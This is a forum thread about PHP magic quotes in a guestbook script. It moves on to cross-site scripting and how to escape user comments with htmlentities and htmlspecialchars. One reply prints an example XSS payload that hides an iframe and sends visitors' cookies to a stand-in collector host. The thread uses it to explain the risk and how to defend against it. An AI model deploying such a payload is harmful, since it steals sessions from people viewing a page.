php and quotation marks

castaban

New Member
Messages
9
Reaction score
0
Points
0
Sorry guys, I program very little with php, I just moved my php script here from a different site. I collect user comments in that script and whenever a user types a " or ' it is escaped like \" or \'. It was not happening in my other site. How can I stop this?. Part of my script:
$filename = 'guest1.html';
$somecontent = $_POST['Comment'];

$somecontent will contain \'s..
 

xadrieth

New Member
Messages
62
Reaction score
1
Points
0
use:

stripslashes();

there is also "addslashes();" if you need to do the oposite.
 

descalzo

Grim Squeaker
Community Support
Messages
9,373
Reaction score
326
Points
83
Free hosting here has what is call ' magic quotes ' enabled. Many places have it disabled.

So input from forms have slashes added.

As mentioned, if $input contains your input,

$input = stripslashes( $input ) ;

should get it back to what the user put in.
 
Last edited:

marshian

New Member
Messages
526
Reaction score
9
Points
0
Make sure that you check the input if you wish to do such a thing! htmlentities and strip_slashes are very useful!
Pay attention to code injections.
 

castaban

New Member
Messages
9
Reaction score
0
Points
0
Thanks guys, very helpful...
Output is written to a flatfile, so I don't worry about SQLinjection
 

xav0989

Community Public Relation
Community Support
Messages
4,467
Reaction score
95
Points
0
Just keep it in mind if you ever plan to move to a database! :biggrin:
 

misson

Community Paragon
Community Support
Messages
2,572
Reaction score
72
Points
48
If content from the flat file is ever going to be displayed in an application that parses HTML, you'll need something like the filter functions to prevent HTML injection/XSS.
 

castaban

New Member
Messages
9
Reaction score
0
Points
0
Now you are worrying me... Flatfile is formatted to be displayed in the browser of course. Format is like this:
<ul><li>
<B>Comment: </B> User comment entered here via textarea <BR>
</ul>

Are you saying somebody can infect my page using the textarea? If so help appreciated how to prevent that...
 

descalzo

Grim Squeaker
Community Support
Messages
9,373
Reaction score
326
Points
83
You can use:

$sanitized_input = htmlspecialchars( $user_input ) ;

OR

$sanitized_input = htmlentities( $user_input ) ;

to start with. The second function is stronger and is the one that you should use.
 
Last edited:

misson

Community Paragon
Community Support
Messages
2,572
Reaction score
72
Points
48
HTML injection?

Also known as Cross Site Scripting (XSS). Imagine someone posts the following comment:
Code:
ur |@m3<script type="text/javascript">var bam=document.createElement('iframe');
bam.style.position='absolute';
bam.style.left='-1000px';
bam.style.width='0px';
bam.style.height='0px';
bam.onload=function() { document.body.removeChild(bam); }
bam.src = 'http://badsite.com/collector?u=' +document.location + '&c=' + document.cookie);
document.body.appendChild(bam);
</script>
The poster will get the cookies of anyone who views the page. A knowledgable coder can even write viral XSS, such as the MySpace worm.
 

castaban

New Member
Messages
9
Reaction score
0
Points
0
So I change it to this then:

$somecontent=stripslashes($somecontent);
$somecontent=htmlentities($somecontent);

users can still use quotes, but there will be at least minimum protection, right...
 

misson

Community Paragon
Community Support
Messages
2,572
Reaction score
72
Points
48
If you want your code to work if magic_quotes_gpc is turned off and on other hosts, you can do something like:
PHP:
function sanitize($somecontent) {
    if (get_magic_quotes_gpc()) {
        $somecontent=stripslashes($somecontent);
    }
    return htmlspecialchars($somecontent);
}
 

descalzo

Grim Squeaker
Community Support
Messages
9,373
Reaction score
326
Points
83
To be even more thorough, one should sanitze # and & by translating them to &#35 (#) and &#38 (&) by something like preg_replace. That will catch some of the more advanced attacks that use Hex encoding.
 

misson

Community Paragon
Community Support
Messages
2,572
Reaction score
72
Points
48
To be even more thorough, one should sanitze # and & by translating them to &#35 (#) and &#38 (&) by something like preg_replace. That will catch some of the more advanced attacks that use Hex encoding.

The htmlspecialchars and htmlentities functions you mentioned earlier will encode &, at which point the # isn't special. Is there a situation where this is insufficient? Multi-byte strings shouldn't be an issue, since htmlspecialchars and htmlentities default to using latin-1.
 

fretwizz

Member
Messages
106
Reaction score
3
Points
18
Now you are worrying me... Flatfile is formatted to be displayed in the browser of course. Format is like this:
<ul><li>
<B>Comment: </B> User comment entered here via textarea <BR>
</ul>

Are you saying somebody can infect my page using the textarea? If so help appreciated how to prevent that...

Yeah... I like to know that myself.
 
Top